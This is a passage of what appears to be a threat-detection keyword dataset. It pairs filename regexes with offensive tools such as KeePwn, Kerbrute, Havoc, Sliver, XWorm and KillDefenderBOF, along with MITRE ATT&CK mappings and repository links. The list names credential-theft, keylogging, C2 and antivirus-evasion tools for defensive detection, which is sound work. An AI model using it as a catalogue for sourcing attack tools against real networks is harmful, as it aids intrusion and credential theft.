"*/keepass_trigger.py*",".{0,1000}\/keepass_trigger\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/keepwn.core.*",".{0,1000}\/keepwn\.core.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*/KeePwn.git*",".{0,1000}\/KeePwn\.git.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to 
automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*/KeePwn.py*",".{0,1000}\/KeePwn\.py.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*/keepwn.utils.*",".{0,1000}\/keepwn\.utils.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*/KeePwn/keepwn/*",".{0,1000}\/KeePwn\/keepwn\/.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*/KeePwn/tarball/*",".{0,1000}\/KeePwn\/tarball\/.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*/KeePwn/zipball/*",".{0,1000}\/KeePwn\/zipball\/.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*/KeePwn-0.3/*",".{0,1000}\/KeePwn\-0\.3\/.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*/KeeThief.git*",".{0,1000}\/KeeThief\.git.{0,1000}","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*/kekeo.exe*",".{0,1000}\/kekeo\.exe.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/kerberoast.*",".{0,1000}\/kerberoast\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/kerberoast.c*",".{0,1000}\/kerberoast\.c.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/kerberoast.c*",".{0,1000}\/kerberoast\.c.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*/kerberoast.h*",".{0,1000}\/kerberoast\.h.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/kerberoast.py*",".{0,1000}\/kerberoast\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/kerberoast/*.*",".{0,1000}\/kerberoast\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/kerberoast_hashes_*.txt*",".{0,1000}\/kerberoast_hashes_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/kerberoastables.txt*",".{0,1000}\/kerberoastables\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/KerberOPSEC.git*",".{0,1000}\/KerberOPSEC\.git.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*/kerberos.py*",".{0,1000}\/kerberos\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/kerberos-ldap-password-hunter*",".{0,1000}\/kerberos\-ldap\-password\-hunter.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*/kerberosticket.py*",".{0,1000}\/kerberosticket\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*/Kerbeus-BOF.git*",".{0,1000}\/Kerbeus\-BOF\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","1","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*/Kerbeus-BOF/*",".{0,1000}\/Kerbeus\-BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*/kerbrute.git*",".{0,1000}\/kerbrute\.git.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*/kerbrute.go*",".{0,1000}\/kerbrute\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential 
Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*/kerbrute.py*",".{0,1000}\/kerbrute\.py.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*/kerbrute/*",".{0,1000}\/kerbrute\/.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*/KernelMii.c*",".{0,1000}\/KernelMii\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","80","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*/KExecDD.git*",".{0,1000}\/KExecDD\.git.{0,1000}","offensive_tool_keyword","KExecDD","Admin to Kernel code execution using the KSecDD driver","T1068 - T1055.011","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/floesen/KExecDD","1","1","N/A","8","2","172","27","2024-04-19T09:58:14Z","2024-04-19T08:54:49Z" "*/keylogger.cpp*",".{0,1000}\/keylogger\.cpp.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","10","10","139","39","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" "*/KeyLogger.cs*",".{0,1000}\/KeyLogger\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/Keylogger.dll*",".{0,1000}\/Keylogger\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" 
"*/keylogger.exe*",".{0,1000}\/keylogger\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","10","10","139","39","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" "*/keylogger/*.*",".{0,1000}\/keylogger\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/keyscan.go*",".{0,1000}\/keyscan\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/KidLogger.app/*",".{0,1000}\/KidLogger\.app\/.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/kidlogger.desktop*",".{0,1000}\/kidlogger\.desktop.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - 
TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/killav.*",".{0,1000}\/killav\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/killav.py*",".{0,1000}killav\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/killav.rb*",".{0,1000}\/killav\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/KillDefenderBOF*",".{0,1000}\/KillDefenderBOF.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","10","3","208","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" "*/killer.exe*",".{0,1000}\/killer\.exe.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","10","7","N/A","N/A","N/A","N/A" "*/Killer.git*",".{0,1000}\/Killer\.git.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","10","7","N/A","N/A","N/A","N/A" "*/kimi.py*",".{0,1000}\/kimi\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/Kirby.ps1*",".{0,1000}\/Kirby\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*/kismet*",".{0,1000}\/kismet.{0,1000}","offensive_tool_keyword","kismet","Kismet is a wireless network and device detector. sniffer. wardriving tool. and WIDS (wireless intrusion detection) framework.","T1016 - T1040 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kismetwireless/kismet","1","0","N/A","N/A","10","1445","287","2024-04-30T03:51:34Z","2016-09-20T13:26:00Z" "*/kismetwireless/*",".{0,1000}\/kismetwireless\/.{0,1000}","offensive_tool_keyword","kismet","Kismet is a wireless network and device detector. sniffer. wardriving tool. 
and WIDS (wireless intrusion detection) framework.","T1016 - T1040 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kismetwireless/kismet","1","1","N/A","N/A","10","1445","287","2024-04-30T03:51:34Z","2016-09-20T13:26:00Z" "*/kitrap0d.*",".{0,1000}\/kitrap0d\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/kittens/haloKitten*",".{0,1000}\/kittens\/haloKitten.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use them with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/kittens/recycleKitten*",".{0,1000}\/kittens\/recycleKitten.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use them with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/KittyStager/*",".{0,1000}\/KittyStager\/.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use them with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/kiwi.rb*",".{0,1000}\/kiwi\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks.
